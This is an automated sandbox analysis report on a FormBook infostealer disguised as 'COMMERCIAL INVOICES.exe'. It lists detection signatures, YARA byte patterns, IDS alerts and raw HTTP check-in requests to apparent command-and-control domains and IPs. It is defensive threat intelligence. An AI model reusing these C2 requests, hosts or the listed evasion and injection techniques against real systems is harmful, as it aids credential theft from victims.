Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
COMMERCIAL INVOICES.exe

Overview

General Information

Sample name:COMMERCIAL INVOICES.exe
Analysis ID:1531665
MD5:57ccf777596297f30d94bc1394d4b38f
SHA1:21fecf43b375e8171f96e13d3d88e83fa5f05cb7
SHA256:29872a0c2ff44faae6e8b1cb4f561978c51a21a195bf545b22e76451521b92d3
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Process Tree

  • System is w10x64
  • COMMERCIAL INVOICES.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe" MD5: 57CCF777596297F30D94BC1394D4B38F)
    • COMMERCIAL INVOICES.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe" MD5: 57CCF777596297F30D94BC1394D4B38F)
      • oKWoZthfkV.exe (PID: 3472 cmdline: "C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • taskkill.exe (PID: 3524 cmdline: "C:\Windows\SysWOW64\taskkill.exe" MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
          • oKWoZthfkV.exe (PID: 3224 cmdline: "C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5900 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1402f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1402f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x170f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.COMMERCIAL INVOICES.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.COMMERCIAL INVOICES.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e233:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x162f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-11T15:09:27.764958+020020507451Malware Command and Control Activity Detected192.168.2.549958154.23.184.9580TCP
            2024-10-11T15:09:51.371879+020020507451Malware Command and Control Activity Detected192.168.2.549989172.67.218.10680TCP
            2024-10-11T15:10:05.167434+020020507451Malware Command and Control Activity Detected192.168.2.54999374.48.31.12380TCP
            2024-10-11T15:10:18.378066+020020507451Malware Command and Control Activity Detected192.168.2.5499973.33.130.19080TCP
            2024-10-11T15:10:32.372952+020020507451Malware Command and Control Activity Detected192.168.2.550001206.119.82.14780TCP
            2024-10-11T15:10:45.986721+020020507451Malware Command and Control Activity Detected192.168.2.55000585.159.66.9380TCP
            2024-10-11T15:10:59.855693+020020507451Malware Command and Control Activity Detected192.168.2.550009104.21.42.21980TCP
            2024-10-11T15:11:13.124797+020020507451Malware Command and Control Activity Detected192.168.2.550013162.0.225.21880TCP
            2024-10-11T15:11:27.797965+020020507451Malware Command and Control Activity Detected192.168.2.550017103.249.106.9180TCP
            2024-10-11T15:11:41.819632+020020507451Malware Command and Control Activity Detected192.168.2.550021199.59.243.22780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-11T15:09:27.764958+020028554651A Network Trojan was detected192.168.2.549958154.23.184.9580TCP
            2024-10-11T15:09:51.371879+020028554651A Network Trojan was detected192.168.2.549989172.67.218.10680TCP
            2024-10-11T15:10:05.167434+020028554651A Network Trojan was detected192.168.2.54999374.48.31.12380TCP
            2024-10-11T15:10:18.378066+020028554651A Network Trojan was detected192.168.2.5499973.33.130.19080TCP
            2024-10-11T15:10:32.372952+020028554651A Network Trojan was detected192.168.2.550001206.119.82.14780TCP
            2024-10-11T15:10:45.986721+020028554651A Network Trojan was detected192.168.2.55000585.159.66.9380TCP
            2024-10-11T15:10:59.855693+020028554651A Network Trojan was detected192.168.2.550009104.21.42.21980TCP
            2024-10-11T15:11:13.124797+020028554651A Network Trojan was detected192.168.2.550013162.0.225.21880TCP
            2024-10-11T15:11:27.797965+020028554651A Network Trojan was detected192.168.2.550017103.249.106.9180TCP
            2024-10-11T15:11:41.819632+020028554651A Network Trojan was detected192.168.2.550021199.59.243.22780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-11T15:09:43.699694+020028554641A Network Trojan was detected192.168.2.549986172.67.218.10680TCP
            2024-10-11T15:09:46.253121+020028554641A Network Trojan was detected192.168.2.549987172.67.218.10680TCP
            2024-10-11T15:09:48.782424+020028554641A Network Trojan was detected192.168.2.549988172.67.218.10680TCP
            2024-10-11T15:09:57.535649+020028554641A Network Trojan was detected192.168.2.54999074.48.31.12380TCP
            2024-10-11T15:10:00.055484+020028554641A Network Trojan was detected192.168.2.54999174.48.31.12380TCP
            2024-10-11T15:10:02.659949+020028554641A Network Trojan was detected192.168.2.54999274.48.31.12380TCP
            2024-10-11T15:10:11.586690+020028554641A Network Trojan was detected192.168.2.5499943.33.130.19080TCP
            2024-10-11T15:10:13.225240+020028554641A Network Trojan was detected192.168.2.5499953.33.130.19080TCP
            2024-10-11T15:10:16.679158+020028554641A Network Trojan was detected192.168.2.5499963.33.130.19080TCP
            2024-10-11T15:10:24.685844+020028554641A Network Trojan was detected192.168.2.549998206.119.82.14780TCP
            2024-10-11T15:10:27.259005+020028554641A Network Trojan was detected192.168.2.549999206.119.82.14780TCP
            2024-10-11T15:10:29.825861+020028554641A Network Trojan was detected192.168.2.550000206.119.82.14780TCP
            2024-10-11T15:10:39.116174+020028554641A Network Trojan was detected192.168.2.55000285.159.66.9380TCP
            2024-10-11T15:10:41.662948+020028554641A Network Trojan was detected192.168.2.55000385.159.66.9380TCP
            2024-10-11T15:10:44.209821+020028554641A Network Trojan was detected192.168.2.55000485.159.66.9380TCP
            2024-10-11T15:10:51.990952+020028554641A Network Trojan was detected192.168.2.550006104.21.42.21980TCP
            2024-10-11T15:10:54.548858+020028554641A Network Trojan was detected192.168.2.550007104.21.42.21980TCP
            2024-10-11T15:10:57.285260+020028554641A Network Trojan was detected192.168.2.550008104.21.42.21980TCP
            2024-10-11T15:11:05.517765+020028554641A Network Trojan was detected192.168.2.550010162.0.225.21880TCP
            2024-10-11T15:11:08.065487+020028554641A Network Trojan was detected192.168.2.550011162.0.225.21880TCP
            2024-10-11T15:11:10.655682+020028554641A Network Trojan was detected192.168.2.550012162.0.225.21880TCP
            2024-10-11T15:11:19.131316+020028554641A Network Trojan was detected192.168.2.550014103.249.106.9180TCP
            2024-10-11T15:11:21.725813+020028554641A Network Trojan was detected192.168.2.550015103.249.106.9180TCP
            2024-10-11T15:11:24.406502+020028554641A Network Trojan was detected192.168.2.550016103.249.106.9180TCP
            2024-10-11T15:11:34.182415+020028554641A Network Trojan was detected192.168.2.550018199.59.243.22780TCP
            2024-10-11T15:11:36.729656+020028554641A Network Trojan was detected192.168.2.550019199.59.243.22780TCP
            2024-10-11T15:11:39.296563+020028554641A Network Trojan was detected192.168.2.550020199.59.243.22780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: COMMERCIAL INVOICES.exeReversingLabs: Detection: 60%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: COMMERCIAL INVOICES.exeJoe Sandbox ML: detected
            Source: COMMERCIAL INVOICES.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: COMMERCIAL INVOICES.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oKWoZthfkV.exe, 00000005.00000000.2455201096.000000000006E000.00000002.00000001.01000000.0000000C.sdmp, oKWoZthfkV.exe, 00000009.00000000.2612639355.000000000006E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2544070820.0000000004812000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2546119933.00000000049C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: COMMERCIAL INVOICES.exe, COMMERCIAL INVOICES.exe, 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, taskkill.exe, 00000006.00000003.2544070820.0000000004812000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000006.00000003.2546119933.00000000049C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdbGCTL source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000003.2594309424.000000000121B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: taskkill.pdb source: COMMERCIAL INVOICES.exe, 00000004.00000002.2544022936.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000003.2594309424.000000000121B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_0086C3E0 FindFirstFileW,FindNextFileW,FindClose,6_2_0086C3E0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4x nop then jmp 0713607Bh0_2_07135EB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 4x nop then xor eax, eax6_2_00859BF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 4x nop then mov ebx, 00000004h6_2_04A404DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50001 -> 206.119.82.147:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 206.119.82.147:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50005 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49993 -> 74.48.31.123:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50005 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 172.67.218.106:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49993 -> 74.48.31.123:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 206.119.82.147:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50001 -> 206.119.82.147:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 162.0.225.218:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 74.48.31.123:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49958 -> 154.23.184.95:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49958 -> 154.23.184.95:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 74.48.31.123:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 162.0.225.218:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 103.249.106.91:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 103.249.106.91:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 172.67.218.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 104.21.42.219:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49989 -> 172.67.218.106:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49989 -> 172.67.218.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 206.119.82.147:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50017 -> 103.249.106.91:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50017 -> 103.249.106.91:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 162.0.225.218:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 104.21.42.219:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49997 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49997 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 172.67.218.106:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50013 -> 162.0.225.218:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50013 -> 162.0.225.218:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 104.21.42.219:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 103.249.106.91:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50021 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50021 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50009 -> 104.21.42.219:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50009 -> 104.21.42.219:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 74.48.31.123:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 199.59.243.227:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.nibcorp.xyz
            Source: DNS query: www.meramhaliyikama.xyz
            Source: DNS query: www.5711337.xyz
            Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /0fcg/?KteDo=fX0Hm8kxa&BHNhDJjp=hJPFsW9wVXXSmVQNX9HyPUqpnWaGwoAwUQqBAOekg/iA3H1k+2o0va3fZiXrpa/qEBgAqlFBPzvmzQvG7thcdV/HiwU/gazVS6QU6A3e7YzcCqqFBxHno6Fx/WWCMuQjEQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.wcr5.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t97r/?BHNhDJjp=fU68x3PRULyXXLX18Be8OZjG7cRSBQSavMkIge0xVdkIxqx/cDskQThzDXmmTxAsHWtrBQPcDxz3o7UBkP1yUbLOTohuYgETqqTp8AigyDVY+hGioDWRRBsptVM6QvNfSQ==&KteDo=fX0Hm8kxa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.syncsnode.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fxh3/?BHNhDJjp=TcdD1jH1CapNlBILQUUL6VPJeSSLh+pbMYQjXnoycmFxozx0bMDFjxvRFdG/tU/CFYGPAPKB1FL/Z2VQy4rjs+2Q8knST/5l8EVmCJfQbrXwTzWaySbdQJ1HTeqiGlwgAw==&KteDo=fX0Hm8kxa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.facaicloud.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qy56/?BHNhDJjp=uyF2ggZKoDdItulgtu2puoUsvXv1Ogv9q0328ASdq3oqq3YtlZ+hpRVw5nQuFecPffSCq9gTwMP2Kh/GIFjlwtIVkvTjWbsmVqyCPN0loUcEBtHyjsPsgz9KuMJn6hseTA==&KteDo=fX0Hm8kxa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.nibcorp.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /u0td/?BHNhDJjp=EpjSVPpO4pF17PlQ3DNgKhd2v7ja1FkLRxKjmJiLsn9eFCahEsp5jtnh1y932jU+ck47tHBUUsolNvMtAutbQ5HDaIUs2x8kIyYJtigiYamWvQ0ME/HlpqSu5UMEi5UFjQ==&KteDo=fX0Hm8kxa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.93wxd.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /vd6t/?BHNhDJjp=XaiJgAiuFnMEtmZURD8Lc3raCMtFBuupNnQYn/g1mG/l0yZG2F7WlL2GsGHsclNHOTCW0P35DR3+uir5yxADGkXKDk67ta12miPg21T/nG4AWXn5T49Yc7XX4Q8eijQzNQ==&KteDo=fX0Hm8kxa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.meramhaliyikama.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
